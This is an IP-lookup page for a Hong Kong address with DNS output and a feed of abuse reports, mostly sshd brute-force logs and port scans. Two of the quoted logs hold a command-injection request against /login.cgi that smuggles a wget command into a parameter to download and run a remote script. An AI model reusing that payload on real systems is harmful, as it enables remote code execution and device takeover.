14.198.148.10 - IPInfo

Basic Info

City: Tseung Kwan O

Region: Sai Kung District

Country: Hong Kong

Internet Service Provider: unknown

Hostname: unknown

Organization: unknown

Usage Type: unknown

Comments:

Make a comment on this IP

No discussion about this IP yet. Click above link to make one.

Comments on same subnet:

No discussion about this subnet yet..

Whois info:

Dig info:

; <<>> DiG 9.10.3-P4-Ubuntu <<>> 14.198.148.10
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 3670
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;14.198.148.10.			IN	A

;; AUTHORITY SECTION:
.			499	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2019092401 1800 900 604800 86400

;; Query time: 133 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Wed Sep 25 03:49:19 CST 2019
;; MSG SIZE  rcvd: 117

Host info

10.148.198.14.in-addr.arpa domain name pointer 014198148010.ctinets.com.

Nslookup info:

Server:		183.60.83.19
Address:	183.60.83.19#53

Non-authoritative answer:
10.148.198.14.in-addr.arpa	name = 014198148010.ctinets.com.

Authoritative answers can be found from:

Related IP info:

Related comments:

IP	Type	Details	Datetime
117.6.160.24	attackspambots	Unauthorized connection attempt detected from IP address 117.6.160.24 to port 445	2019-12-23 16:12:27
193.112.90.146	attackbots	Dec 22 21:50:11 web1 sshd\[5589\]: Invalid user schultze from 193.112.90.146 Dec 22 21:50:11 web1 sshd\[5589\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=193.112.90.146 Dec 22 21:50:13 web1 sshd\[5589\]: Failed password for invalid user schultze from 193.112.90.146 port 58706 ssh2 Dec 22 21:56:07 web1 sshd\[6141\]: Invalid user dinny from 193.112.90.146 Dec 22 21:56:07 web1 sshd\[6141\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=193.112.90.146	2019-12-23 16:21:15
222.186.190.92	attackbotsspam	Dec 23 08:40:18 sd-53420 sshd\[16317\]: User root from 222.186.190.92 not allowed because none of user's groups are listed in AllowGroups Dec 23 08:40:18 sd-53420 sshd\[16317\]: Failed none for invalid user root from 222.186.190.92 port 52970 ssh2 Dec 23 08:40:18 sd-53420 sshd\[16317\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.186.190.92 user=root Dec 23 08:40:21 sd-53420 sshd\[16317\]: Failed password for invalid user root from 222.186.190.92 port 52970 ssh2 Dec 23 08:40:24 sd-53420 sshd\[16317\]: Failed password for invalid user root from 222.186.190.92 port 52970 ssh2 ...	2019-12-23 15:42:46
186.67.248.8	attack	Dec 23 07:29:34 MK-Soft-VM7 sshd[20604]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=186.67.248.8 Dec 23 07:29:36 MK-Soft-VM7 sshd[20604]: Failed password for invalid user qy from 186.67.248.8 port 54824 ssh2 ...	2019-12-23 15:52:59
220.194.237.43	attackspam	12/23/2019-01:29:39.331516 220.194.237.43 Protocol: 6 ET SCAN NMAP -sS window 1024	2019-12-23 15:51:48
105.212.59.7	attack	[ES hit] Tried to deliver spam.	2019-12-23 16:18:20
218.111.88.185	attackspam	2019-12-23T07:29:04.942957centos sshd\[7319\]: Invalid user guest from 218.111.88.185 port 59482 2019-12-23T07:29:04.948357centos sshd\[7319\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=218.111.88.185 2019-12-23T07:29:07.044691centos sshd\[7319\]: Failed password for invalid user guest from 218.111.88.185 port 59482 ssh2	2019-12-23 16:20:53
80.211.29.59	attack	Dec 23 05:14:10 h2421860 sshd[12972]: reveeclipse mapping checking getaddrinfo for host59-29-211-80.serverdedicati.aruba.hostname [80.211.29.59] failed - POSSIBLE BREAK-IN ATTEMPT! Dec 23 05:14:10 h2421860 sshd[12972]: Received disconnect from 80.211.29.59: 11: Bye Bye [preauth] Dec 23 05:14:10 h2421860 sshd[12974]: reveeclipse mapping checking getaddrinfo for host59-29-211-80.serverdedicati.aruba.hostname [80.211.29.59] failed - POSSIBLE BREAK-IN ATTEMPT! Dec 23 05:14:10 h2421860 sshd[12974]: Invalid user admin from 80.211.29.59 Dec 23 05:14:10 h2421860 sshd[12974]: Received disconnect from 80.211.29.59: 11: Bye Bye [preauth] Dec 23 05:14:11 h2421860 sshd[12976]: reveeclipse mapping checking getaddrinfo for host59-29-211-80.serverdedicati.aruba.hostname [80.211.29.59] failed - POSSIBLE BREAK-IN ATTEMPT! Dec 23 05:14:11 h2421860 sshd[12976]: Invalid user admin from 80.211.29.59 Dec 23 05:14:11 h2421860 sshd[12976]: Received disconnect from 80.211.29.59: 11: Bye Bye [pre........ -------------------------------	2019-12-23 16:12:45
185.247.140.245	attackspam	Dec 23 08:34:26 MK-Soft-Root2 sshd[19380]: Failed password for root from 185.247.140.245 port 37618 ssh2 ...	2019-12-23 15:41:37
51.75.160.215	attackspambots	Dec 23 02:51:33 TORMINT sshd\[22365\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=51.75.160.215 user=root Dec 23 02:51:35 TORMINT sshd\[22365\]: Failed password for root from 51.75.160.215 port 37258 ssh2 Dec 23 02:57:03 TORMINT sshd\[22770\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=51.75.160.215 user=root ...	2019-12-23 16:19:30
202.189.235.18	attackspam	Unauthorised access (Dec 23) SRC=202.189.235.18 LEN=52 TTL=112 ID=10598 DF TCP DPT=445 WINDOW=8192 SYN	2019-12-23 15:50:17
41.237.129.19	attackbots	1 attack on wget probes like: 41.237.129.19 - - [22/Dec/2019:04:20:27 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.132.53.119/Venom.sh%20-O%20-%3E%20/tmp/kh;Venom.sh%20/tmp/kh%27$ HTTP/1.1" 400 11	2019-12-23 15:50:47
61.177.172.128	attackbots	Dec 23 09:16:20 ns381471 sshd[21576]: Failed password for root from 61.177.172.128 port 44961 ssh2 Dec 23 09:16:32 ns381471 sshd[21576]: error: maximum authentication attempts exceeded for root from 61.177.172.128 port 44961 ssh2 [preauth]	2019-12-23 16:18:58
123.207.16.33	attackspam	Dec 23 07:29:47 cp sshd[13413]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=123.207.16.33	2019-12-23 15:44:19
197.35.222.111	attack	2 attacks on wget probes like: 197.35.222.111 - - [22/Dec/2019:14:35:21 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.132.53.119/Venom.sh%20-O%20-%3E%20/tmp/kh;Venom.sh%20/tmp/kh%27$ HTTP/1.1" 400 11	2019-12-23 15:47:57

Recently Reported IPs

123.53.196.215	89.103.52.238	203.33.77.201	31.246.8.218
110.10.129.209	144.83.253.165	36.54.59.30	108.94.160.108
180.157.21.161	39.36.191.59	98.236.155.185	27.42.112.151
68.79.170.249	191.92.152.42	151.161.204.239	166.128.34.8
118.77.153.132	49.67.65.128	168.131.93.59	218.135.134.32